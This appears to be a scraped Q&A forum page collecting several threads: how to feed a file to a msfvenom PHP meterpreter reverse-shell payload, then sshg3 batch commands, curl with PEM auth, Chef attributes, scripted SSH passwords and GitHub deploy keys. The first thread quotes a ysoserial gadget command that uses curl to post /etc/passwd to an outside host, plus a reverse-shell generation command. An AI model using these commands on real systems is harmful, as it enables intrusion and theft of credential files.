I want to path a file with generate Metasploit shell. It is like this:
java -jar ysoserial.jar CommonsCollections1 "curl -X POST -F file=#etc/passwd axample.com" | base64
like -F file in example, I want to path a file in command:
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
This is just command I want to path a file. My file is a payload file (etc/payload). I don't know the command for doing this. I tried to find a tutorial, but couldn't.
As I understand, you are using msfvenom tool to generate a Meterpreter payload - the program that will run on the target host (in this case it will bring you command shell of the target host).
This payload is a part of Metasploit framework - a predefined program, not your custom script and you want to pass your file to it. If so, it all depends on the Meterpreter's parameters to pass anything to it. But it seems that there is no such option as just path a some file in Meterpreter.
In example with curl the -F option is recognized by cURL application and stands for HTTP Forms posting and directs web server for file uploading with given by property name file.
But what path to file you want to pass to the Meterpreter payload? What is your final goal? Now it looks like no sense for it.
UPDATE for you comment
The curl is a different application and they use -F option format implemented. In msfvenom use to pass variable CUSTOM1 the following form:
msfvenom -p <payload> LHOST=<...> LPORT=<...> CUSTOM1=<...> ...
Related
I have tectia ssh server in a windows environment.
When I use sftpg3 -B cmd.txt username#host that works fine. The only problem is that it doesnt let me execute files remotely, it only lets me move files. It reads the commands from cmd.txt but since I cant execute anything it ignores the commands.
Well when I do the same thing but use sshg3, it doesnt recognize the -B flag at all.
SSHG3 -B cmd.txt username#host
cmd.txt' is not recognized as an internal or external command,
operable program or batch file.
I've tried putting -B "cmd.txt"
I tried just putting the cmd.txt contents in the same script instead of housing them in cmd.txt and getting rid of -B, but it doesnt run them that way either.
The docs dont have much to go off of. All it says is use -B for batch processing.
Contents of cmd.txt:
D:
cd Library
cd Backup
parseLibrary.cmd
exit
Trying to sshg3 into a host, navigate to a path and run a batch file on that host.
Any ideas?
-B, --batch-mode
Uses batch mode. Fails authentication if it requires user interaction on the terminal.
Using batch mode requires that you have previously saved the server host key on the client and set up a non-interactive method for user authentication (for example, host-based authentication or public-key authentication without a passphrase).
It does use public key authentication, there is no user interaction needed on the terminal.
Noticed this on the docs for sftpg3
-B [ - | batch_file ]
The -B - option enables reading from the standard input. This option is useful when you want to launch processes with sftpg3 and redirect the stdin pipes.
By defining the name of a batch_file as an attribute, you can execute SFTP commands from the given file in batch mode. The file can contain any allowed SFTP commands. For a description of the commands, see the section called “Commands”.
Using batch mode requires that you have previously saved the server host key on the client and set up a non-interactive method for user authentication (for example, host-based authentication or public-key authentication without a passphrase).
I'm guessing batch file is different than batch mode?
*I figured it out. You have to use the -B flag for every command you want to execute.
I figured it out. You have to use the -B flag for every command you want to execute.
sshg3 user#host -B dir -B ipconfig -B etc.cmd
So I want to call a REST API from Bamboo after a deployment has completed.
This API needs a username and password but it can't be stored in Bamboo as it seems it can be viewed in the Bash History of the Build agent.
I intended to use a script task and execute something like
curl -f -v -k --user "${bamboo.user}":"${bamboo.password}" -X POST https://bamboo.url/builds/rest/api/latest/queue/project_name"/
This would make the REST call. But the username and password is a problem.
I do have the option, however of using a PEM file. It can be provided so does anyone know if this can be used in conjunction with the cURL?
--OR--
One other thought- could I encrypt a password within a file in my source control, and somehow decrypt it on the build agent, and then have curl use the file instead of reading the password from the command line? How would this look in cURL?
Any ideas how this could be achieved?
Your command seems to have an extra quote at the end of your command
Using a pem file to authenticate with curl:
curl -E /path/to/user-cert.pem -X POST https://bamboo.url/builds/rest/api/latest/queue/project_name
The file should have both private key and public key inside.
I am working in Hosted Chef environment in windows.We have a UI from where we run Chef Scripts.When there are no parameters to be passed we just select the script to be executed and run the batch file with knife commands in the background execute the scripts.
Now I need to pass parameters dynamically to the recipes.I have tried adding attributes in the attribute file.It is working fine.But each time, I need to download and change the attributes and upload the recipes to chef server and run it using batch file which is quite tedious and time consuming.
Is there any other way to fulfil this requirement ?
Thanks for your help.
You can use environment variables in your recipe code, but that is often very brittle. You can also read a local file either via the -j option mentioned above or by just opening and reading the file yourself in your recipe code. There is no direct way to pass parameters to recipes, and it generally indicates you are doing something non-convergent.
You can add attributes to the chef-client call directly. That kills the "when there are no parameters to be passed", but it does allow you to get attributes in at run-time. There are two ways to do this. Either you pass in a file with the -j option (which might work nicely with your GUI), or you can hack it. This hack works with linux, not sure how you'd do it with windows, but I'm sure there is a similar option.
echo '{ "myjson": "here" }' | chef-client -j /dev/stdin
Or if you are using winrm to run chef-client something like this:
knife winrm -m ipaddress 'echo "{ \"param\":\"test\"}" | chef-client -c c:/ chef/client.rb -j /dev/sdin' -m -x Administrator -P '######'
That assumes you have a linux machine on the other end. Otherwise, I'm not sure how to read stdin as if it were a file. -j /dev/stdin probably won't work for windows clients.
I've created a really long script which fully automates installation and configuration of a web server in my company. During the script runtime it accesses some remote server using scp and ssh in order to download configuration files and I'd like to be able to have a secret file which holds the password (it's always the same password) and that the script will use this file without the need that i'll insert it manually. some lines from the script look like this:
/usr/bin/scp root#192.168.1.10:/etc/mail/sendmail.cf /etc/mail/
/usr/bin/scp -r root#192.168.1.10:/etc/yum.repos.d /etc/
/usr/bin/ssh root#192.168.1.10 'rpm -qa --queryformat "%{NAME}\n" >/tmp/sw.lst'
/usr/bin/scp root#192.168.1.10:/tmp/sw.lst /tmp/
/usr/bin/xargs yum -y install < /tmp/sw.lst
I know about the method of #ssh-keygen and #ssh-copy-id but the problem is that the script will run every time on a different machine and I don't want to exchange the keys before each run.
When i had to do something like that, i used expect and a wrapper script that would fetch a password from a file.
I.e. in my password file i'd have something like
root#192.168.1.10 ThisIsMyPass
user#localhost thisIsMyOtherPass
and then have the wrapper script get (it could be simple as grep "root#192.168.1.10" ~/.passwords | cut -d ' ' -f2)
Im guessing there are more appropriate methods, but with this one you only need to keep your wrapper and password file protected and you can make your setup script public.
Alright, here's what I'm trying to do. I'm attempting to write a quick build script in bash that will check out a private repository from GitHub on a remote server. To do this a "hands off" as possible, I want to generate a local RSA key set on the remote server and add the public key as a Deploy Key for that particular repository. I know how to do this using GitHub's API, but I'm having trouble building the JSON payload using Bash.
So far, I have this particular process included below:
#!/bin/bash
ssh-keygen -t rsa -N '' -f ~/.ssh/keyname -q
public_key=`cat ~/.ssh/keyname.pub`
curl -u 'username:password' -d '{"title":"Test Deploy Key", "key":"'$public_key'"}' -i https://api.github.com/repos/username/repository/keys
It's just not properly building the payload. I'm not an expert when it comes to string manipulation in Bash, so I could seriously use some assistance. Thanks!
It's not certain, but it may help to quote where you use public_key, i.e.
curl -u 'username:password' \
-d '{"title":"Test Deploy Key", "key":"'"$public_key"'"}' \
-i https://api.github.com/repos/username/repository/keys
Otherwise it will be much easier to debug if you use the shell's debugging options set -vx near the top of your bash script.
You'll see each line of code (or block (for, while, etc) as it is in your file. Then you see each line of code with the variables expanded to their values.
If you're still stuck, edit your post to show the expanded values of variables for the problem line in your script. What you have looks reasonable at first glance.